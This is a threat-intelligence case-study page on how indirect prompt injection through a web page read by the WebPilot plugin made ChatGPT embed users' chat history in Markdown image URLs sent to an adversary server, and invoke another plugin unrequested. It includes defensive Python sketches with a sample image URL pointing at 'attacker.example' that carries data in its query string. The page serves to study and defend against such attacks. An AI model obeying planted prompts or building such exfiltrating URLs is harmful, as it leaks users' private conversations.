PromptRiskDB: Threat intelligence atlas
AI Case Study

ChatGPT Conversation Exfiltration - AI Case Study

Embrace the Red demonstrated that ChatGPT users' conversations can be exfiltrated via an indirect prompt injection. To execute the attack, a threat actor uploads a malicious prompt to a public website, where a ChatGPT user may interact with it. The prompt causes ChatGPT to respond with the markdown for an image, whose URL has the user's conversation secretly embedded. ChatGPT ren...

Exercise | OpenAI ChatGPT | Embrace The Red | Resource Development | Initial Access | Execution

Overview

Case steps: 7. Steps described in the case record.
Techniques: 7. Attack methods mentioned in the case steps.
Linked CVEs: 0. Known vulnerabilities mentioned in the record.

Risk patterns

Patterns found in the case record and its linked vulnerabilities.

  1. Dominant ATLAS tactic. Resource Development appears in 2 case steps.
  2. Multiple attack methods. The case connects to 7 unique AI attack methods.

Procedure timeline

Steps by tactic: Resource Development (2), Initial Access (1), Execution (1), Exfiltration (1), Privilege Escalation (1), Impact (1)
  1. Resource Development

    The researcher developed a prompt that causes ChatGPT to include a Markdown element for an image with the user's conversation embedded in the URL as part of its responses.

  2. Initial Access

    When the user makes a query that causes ChatGPT to retrieve the webpage using its WebPilot plugin, ChatGPT ingests the adversary's prompt.

  3. Execution (indirect prompt injection; Step 4 in the case record)

    The prompt injection is executed, causing ChatGPT to include a Markdown element for an image hosted on an adversary-controlled server and to embed the user's chat history as a query parameter in the URL.

  4. Exfiltration

    ChatGPT automatically renders the image for the user, making a request to the adversary's server for the image contents and thereby exfiltrating the user's conversation.

  5. Privilege Escalation

    Additionally, the prompt can cause the LLM to execute other plugins that do not match a user request. In this instance, the researcher demonstrated the WebPilot plugin making a call to the Expedia plugin.

  6. Impact: User Harm (Step 7 in the case record)

    The user's privacy is violated, and they are potentially open to further targeted attacks.
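The Execution and Exfiltration steps hinge on one mechanism: whatever is placed in an image URL's query string leaves the client as soon as the image is rendered. The sketch below, written from a defender's point of view, finds Markdown images in a model response and decodes their query parameters to show what a renderer would send to each host. It is an illustration only, not part of the case record; the function name `image_request_payloads`, the simplified regular expression, and the host `attacker.example` are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Simplified pattern for Markdown images: ![alt](url) or ![alt](url "title").
# Assumption: this does not cover every form allowed by Markdown parsers.
MD_IMAGE = re.compile(r'!\[[^\]]*\]\(\s*<?([^\s)>]+)>?[^)]*\)')


def image_request_payloads(markdown: str) -> list[tuple[str, dict[str, str]]]:
    """Return (host, decoded query parameters) for each Markdown image found."""
    results = []
    for match in MD_IMAGE.finditer(markdown):
        parts = urlsplit(match.group(1))
        # parse_qsl percent-decodes values, revealing any embedded text.
        params = dict(parse_qsl(parts.query, keep_blank_values=True))
        results.append((parts.hostname or "", params))
    return results


if __name__ == "__main__":
    # Hypothetical model response containing an image with data in the URL.
    response = (
        "Here is your summary. "
        "![loading](https://attacker.example/pixel.png?q=User%20asked%20about%20flights)"
    )
    for host, params in image_request_payloads(response):
        print(host, params)
```

Running the script lists the destination host together with the decoded text that would accompany the image request, which is the data an adversary-controlled server would receive.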

Mitigations

Defenses connected to the attack methods in this case.
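
One commonly discussed defense against this class of exfiltration is to avoid rendering images from untrusted hosts. The following is a minimal sketch of that idea, assuming the application can post-process model output before it is displayed. It is not a mitigation taken from the case record; the allowlist contents, the function name `strip_untrusted_images`, and the placeholder text are all hypothetical.

```python
import re
from urllib.parse import urlsplit

# Simplified pattern for Markdown images: ![alt](url) or ![alt](url "title").
MD_IMAGE = re.compile(r'!\[([^\]]*)\]\(\s*<?([^\s)>]+)>?[^)]*\)')

# Hypothetical allowlist; a real deployment would choose its own hosts.
TRUSTED_IMAGE_HOSTS = frozenset({"images.example.com"})


def strip_untrusted_images(markdown: str, trusted_hosts=TRUSTED_IMAGE_HOSTS) -> str:
    """Replace Markdown images with a text placeholder unless they are
    served over HTTPS from an allowlisted host."""

    def replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        try:
            parts = urlsplit(url)
            host = (parts.hostname or "").lower()
            trusted = parts.scheme == "https" and host in trusted_hosts
        except ValueError:
            # Malformed URLs are treated as untrusted.
            trusted = False
        if trusted:
            return match.group(0)
        return f"[image removed: {alt}]" if alt else "[image removed]"

    return MD_IMAGE.sub(replace, markdown)


if __name__ == "__main__":
    text = "Hi ![x](https://attacker.example/p.png?q=secret) there"
    print(strip_untrusted_images(text))
```

Because the image element is replaced before rendering, no request is made to a host outside the allowlist. The sketch filters only Markdown image syntax; other outbound channels, such as raw HTML or clickable links, would need separate handling.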

Sources

Original public records and references for this case.

Open the MITRE ATLAS data and public references used for this case study.